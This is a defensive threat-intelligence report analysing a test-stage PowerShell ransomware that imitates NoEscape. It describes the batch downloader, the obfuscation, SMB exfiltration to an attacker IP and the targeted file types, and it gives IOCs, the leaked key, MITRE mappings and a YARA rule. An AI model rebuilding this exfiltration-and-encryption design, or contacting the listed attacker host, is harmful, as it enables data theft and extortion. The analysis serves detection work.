Key Takeaways
- Cyble Research & Intelligence Labs (CRIL) discovered a BAT file interacting with an open directory.
- Further investigation suggested that the batch file acts as a downloader for ransomware.
- Our investigation indicates that the Threat Actor was actively testing the PowerShell-based ransomware, as evidenced by its evolution during our analysis.
- This ransomware variant employs SMB shares for both data exfiltration and the distribution of ransom notes.
- A differentiating factor between this ransomware variant and others is that it refrains from renaming files while masquerading as NoEscape Ransomware, which is evident from the ransom note dropped. This is further supported by the TA not including any communication channels or leak sites.
- In addition to the ransom note demanding 30 Bitcoin, the TA also claims to have compromised an educational institution.
- CRIL has already reported on an existing NoEscape ransomware variant in the past. This variant operates on a Ransomware-as-a-Service (RaaS) model and uses double extortion.
Overview
Cyble Research & Intelligence Labs (CRIL) discovered an archive containing a batch file on VirusTotal.
Upon further examination of this batch file, we noticed that the PowerShell script was evolving over a period of 2 days. This indicates that the TA was likely engaged in testing the ransomware.
To conduct this testing, the TA utilized SMB share to exfiltrate data and also deliver files to encrypt the victim’s system. SMB share is also used to deliver the ransom note to victim systems.
The contents of the ransom note indicate a potential imitation of the NoEscape ransomware, which is evident from the ransom note that clearly states “NoEscape” on the top.
It is worth mentioning that the ransom demand specifies 30 Bitcoins, amounting to approximately USD 780,000, and claims to have compromised a university.
Here are our observations about the evolution of the ransomware:
- Initially, this ransomware was exfiltrating and encrypting files with specific file extensions, and the encryption keys retrieved from a remote server were in plain text.
- As the testing progressed, the TA introduced over 70 additional file extensions to the encryption process (as shown in Figure 3).
- The encryption keys were encoded in Base64. The TA also added a feature to identify the victim’s public IP address as part of an enhancement.
After encrypting the files, the ransom note is fetched from an SMB share and displayed using Notepad.exe. The figure below shows the process tree.
Technical Analysis
The infection begins with a batch file, which has a double extension named “Readme.txt.bat”. The TA has employed such a naming tactic to deceive users into believing the file is innocuous, whereas, in reality, it is a malicious batch script.
This batch script connects to a remote SMB share using Windows’ net utility. This retrieves a PowerShell script file “combined.ps1” and executes it.
The content of the PowerShell script has been encoded using reverse Base64 encoding. This technique is used to obfuscate the data’s true nature or evade detection, as shown in the figure below.
This PowerShell script is composed of three main code blocks, each serving distinct functions.
Code Block 1: Data Exfiltration
In this code block, an array named $fileTypes is defined to list various file extensions. These extensions will be targeted by a script for exfiltration followed by encryption.
The script targets the following file extensions:
| .csv | .svg | .kdbx | .crt | |
| .txt | .xml | .msg | .tiff | .cer |
| .xls | .json | .zip | .key | .pfx |
| .mdb | .yml | .bak | .seed | .ssh |
| .sql | .yaml | .wallet | .qbw | .conf |
| .doc | .rtf | .ods | .pay | .pst |
| .docx | .psd | .odt | .ifx | .ost |
| .ppt | .ai | .jks | .sage | .eml |
| .pptx | .indd | .db | .sds | .qbb |
| .xlsx | .dwg | .dat | .123 | .qbw |
| .accdb | .dxf | .keystore | .peachtree | .rdp |
| .odt | .skp | .snt | .ini | .config |
| .ods | .cad | .qfx | .aws | .htpasswd |
| .odp | .eps | .qb | .credentials | |
| .odb | .ps | .1password | .ovpn |
Additionally, an SMB share path, \\207.38.198[.]187\Exchange\BETO\1, is assigned to the variable $smbShare, and the script retrieves the victim’s public IP address using a GET request to ‘hxxp://ipinfo.io/ip’.
Then, a new SMB share path is created by combining $smbShare with the victim’s IP address, and the script checks whether this directory exists. If the directory doesn’t exist, it is created using the New-Item cmdlet.
The figure below shows Code Block 1.
The TA employs the creation of these directories to distinguish exfiltrated data originating from various victims, thereby implementing an approach of data categorization.
The figure below shows the code for data exfiltration.
This PowerShell script iterates through all available local drives, and for each drive, it scans for files of specified types listed in the $fileTypes variable. This is done by using the Get-ChildItem cmdlet to search for these files recursively within the drive’s root directory.
For each discovered file, the script constructs a destination path within a designated SMB share, creating any required directories along the way.
Code Block 2: File Encryption
This Code Block is designed to perform file encryption on files found on local drives.
It iterates through each available drive using the Get-PSDrive cmdlet, targeting the file types specified in the $fileTypes array.
The script attempts to encrypt each file matching these types using the Rijndael algorithm.
The figure below shows the code for drive enumeration.
Code block 2 then fetches the Base64 encoded encryption key and Initialization Vector (IV) stored on a remote file within an SMB share: “\\207[.]38.198[.]187\Exchange\BETO\null[.]txt”
Since the encryption keys are stored on a remote server, it is easy to decrypt these files. The following Base64 encoded content is fetched from a remote server:
- Encryption key = GMOc/5uEaQQJ+3YMvV4kID02RZERA+Ywvihe3DcnXh0=
- Initialization Vector = d6OJu2qgaW2HfESH/qCvJQ==
This script now decodes the Base64 values and passes them as a parameter to the Rijndael encryption algorithm, as shown below.
Notably, unlike other ransomware variants, it refrains from renaming the file after encryption, which can pose a challenge when it comes to distinguishing between an encrypted and an unencrypted file.
The figure below illustrates the encrypted file.
Code Block 3: Ransom Note
In the final code block, the script defines a remote file path “\\207.38.198.187\Exchange\BETO\RANSOM.txt” and a destination path on the user’s desktop using “[Environment]::GetFolderPath(‘Desktop’)”.
The script then copies the remote ransom note file (RANSOM.txt) to the user’s desktop.
The figure below shows the code to fetch the ransom note.
Finally, it opens the copied ransom note file using the Notepad application using the command “Start-Process “notepad.exe” -ArgumentList $destinationPath”.
The figure below shows the ransom note.
Conclusion
This ransomware appears to be in a testing phase, as indicated by the evolution we have observed over 2 days. The imitation of the well-known NoEscape ransomware, with its large Bitcoin ransom demand and claims of hacking a university, makes this variant particularly interesting.
What really raised our suspicions, however, is the fact that the ransom note does not mention any website for leaks or ways to communicate. It is also worth mentioning that the attackers didn’t use the same methods as NoEscape, such as using double extortion.
The lack of sophistication is further evident in the accessibility of encryption keys, making it relatively easy to decrypt any encrypted files.
Our Recommendations
- Implement application whitelisting to restrict the execution of PowerShell scripts to only approved and trusted scripts or locations.
- Utilize network monitoring tools to continuously monitor SMB traffic for suspicious patterns or anomalies.
- Set up alerts for unusual SMB connection attempts, excessive failed login attempts, or unexpected data transfers.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| Execution | T1059 | Command and Scripting Interpreter
User Execution |
| Defense Evasion | T1027 | Obfuscated Files or Information
Indirect Command Execution Masquerading |
| Discovery | T1083 | File and Directory Discovery |
| Collection | T1005 | Data from Local System
Automated Collection |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
| Impact | T1486 | Data Encrypted for Impact |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| 48dbe4460b65ff1fe59db35575c91d04715c8434d6c24c0c4cdf4545bc09e7d0 | SHA256 | Malicious BAT File |
| 2e56fc252e32b6a231256b31c615dd0b277952211b5d23ad40263755a5c11d5c | SHA256 | Malicious BAT File |
| 207.38.198[.]187 | IP | C&C |
| hxxp://207.38.198[.]187/Exchange/BETO/combined[.]ps1 | URL | Malicious URL |
Yara Rule
rule BAT_Ransomware_Downloader{
meta:
author = “Cyble Research and Intelligence Labs”
description = “Detects BAT file downloading imitator of NoEscape ransomware from SMB Share”
date = “2023-09-01”
os = “Windows”
strings:
$a1 Â = “SMBPath” nocase ascii
$a2 Â = “\\207.38.198.187” ascii
$a4 Â = “combined.ps1” nocase ascii
condition:
all of them
}
